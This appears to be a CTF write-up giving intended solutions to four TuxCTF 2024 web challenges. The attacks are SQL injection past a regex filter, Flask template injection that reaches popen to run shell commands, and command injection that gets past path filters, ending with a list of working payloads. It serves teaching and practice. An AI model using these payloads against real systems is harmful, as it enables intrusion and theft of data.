tuxCTFV1

TuxCTF 2024 web Writeups

Hello, This is the Intended solutions for TuxCTF 2024 web Challenges

Level1 Sanity Check

you just have to view the page source

The Flag:

tuxCTF{a1wAyS_ch3Ck_C0Mm3ntS}

We enter the link and find a login page

And we have the source code , whats intresting is the login.php file

We find a waf function, how does preg_match works it searches for anything but litters and numbers, so anything else will be blocked!

but preg_match is vulnerable, we can bypass it by giving it a long input, then it will not sanatize all of it and we can do sql injection!

to bypass the function we can do:

python3 -c 'print("A" * 9000)'

we copy the output and put in the last of it ‘or true– ‘

and we have the flag!!!

The Flag:

tuxCTF{$4n1T!ze_y0Ur_qu3rIeS}

Level 3 Templates

We go to the link , the page is empty, we notice the query parameter “template”.

In the source code we discover it’s a web app with flask.

a waf that blocks some words.

A quick google search and we know that flask is vulnerable to ssti!!!

to test it we will use the payload

and success it returned 49 which means it calculated it.

SSTI payloads

we try this payload dict.__base__.__subclasses__()

we get a list of python classes, what we are intrested in is popen , if we can access it we can do anything on the server!!!

we have two ways to determine the popen class number: 1) write a python script which i will not do 2) fuzzing until we get it

on my local machine i got this dict.__base__.__subclasses__()[291]

The Full Payload:

dict.__base__.__subclasses__()[291]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()

The Flag:

tuxCTF{1s_1t_5$ti_0r_5$rf}

Level4 dots

for this challenge you also have the source code.

it’s also a flask web app, but you can only access /run_command and only send post requests to it.

open burpsuite and intercept the request.

right click in the request to change the method to POST.

if you try to send the request with anything this will be the response:

if we look back at the source code we will know that it takes the body parameters in json format.

data = request.get_json()

then it will look for the key “command” and sanitize the data.

if 'command' in data:
        command = str(data['command'])

        # Length check
        if len(command) < 5:
            return jsonify({'message': 'Command too short'}), 501

        # Perform security checks
        if '..' in command or '/' in command:
            return jsonify({'message': 'Hacking attempt detected'}), 501

to be able to send json data we need to change the header content type to application/json.

then add {"command" : "hi"} to the body of the request.

now if we send it we will get this response:

which means our payload is working.

now let’s understand how does the app work:

# Find path to executable
        executable_to_run = command.split()[0]

        # Check if we can execute the binary
        if os.access(executable_to_run, os.X_OK):

            # Execute binary if it exists and is executable
            out = os.popen(command).read()
            return jsonify({'message': 'Command output: ' + str(out)}), 200

    return jsonify({'message': 'Not implemented'}), 501


if __name__ == '__main__':

    # Make sure we can only execute binaries in the executables directory
    os.chdir('./executables/')

    # Run server
    app.run(host='0.0.0.0', port=7000)

here we can see that it will take the payload we send it, in the payload {“command” : “hi”} it will take it “hi” and then checks if it’s an executable in a directory named executables. we know this directory is empty from the docker file.

since the app is running on a Linux machine we know that the if the file is executable it will have the “x” permission.

if we try to do the command ls -la in a local Linux machine this the output:

we notice that . and .. are executable, .. is blacklisted but . is not!

if send {"command" : "."} we will get command to short, but if we send it with spaces {"command" : ". "}

it works !!!

the output is empty because the command . doesnt give anything back, but we know in Linux we can do multiple commands in one line using pipe | or a semicolon, let’s try that.

{"command" : ". | pwd"}

it works!!!

if we try {"command" : ". | ls .."} or {"command" : ". | ls /"} it will respond with:

to bypass this we can do alot of things, i choose to do {"command" : ". | ls .''."}

we can see that flag.txt is in the before directory, to bypass the slash restriction we can use ${HOME:0:1}

{"command" : ". | cat .''.${HOME:0:1}flag.txt"}

to understand the payload, if we run echo .''. in any linux terminal the output will be ... and ${HOME:0:1}, ${} we tell the shell to give us the output of some operation, here we tell it to take the home path variable , which is in every linux system, then it will slice it, for example the home directory absolute path is /home/kali it will take the first character which is /, so what will be executed in the machine terminal is

you can find various bypassing techniques in hacktricks:

Bypass Linux Restrictions Payloads

pwned!!!

The Flag:

tuxCTF{d0t$_4r3_3XeCut@b13}

here is a list of all intended payloads to solve this challenge:

{ "command" : ". | ((echo Li4vZmxhZy50eHQ= | base64 -d) | xargs cat)" }
{ "command" : ". | ((echo L3Vzci9zcmMvYXBwL2ZsYWcudHh0 | base64 -d) | xargs cat)"}
{ "command" : ". <(echo true) && cd $(dirname $PWD) && cat flag.txt" }
{ "command" : ". <(echo true) ; cd $(dirname $PWD) ; cat flag.txt" }
{ "command" : ". | cat ${HOME:0:1}usr${HOME:0:1}src${HOME:0:1}app${HOME:0:1}flag.txt" }
{ "command" : ". ; python -c 'import os;x=os.path.normpath(os.getcwd() + os.sep + os.pardir);os.chdir(x);os.system(\"cat flag.txt\")'"}
{ "command" : ". $ or | or ; cat .''.${HOME:0:1}flag.txt 2>&1"}
{ "command" : ". <(echo true) &&  cat  .''.${HOME:0:1}flag.txt " }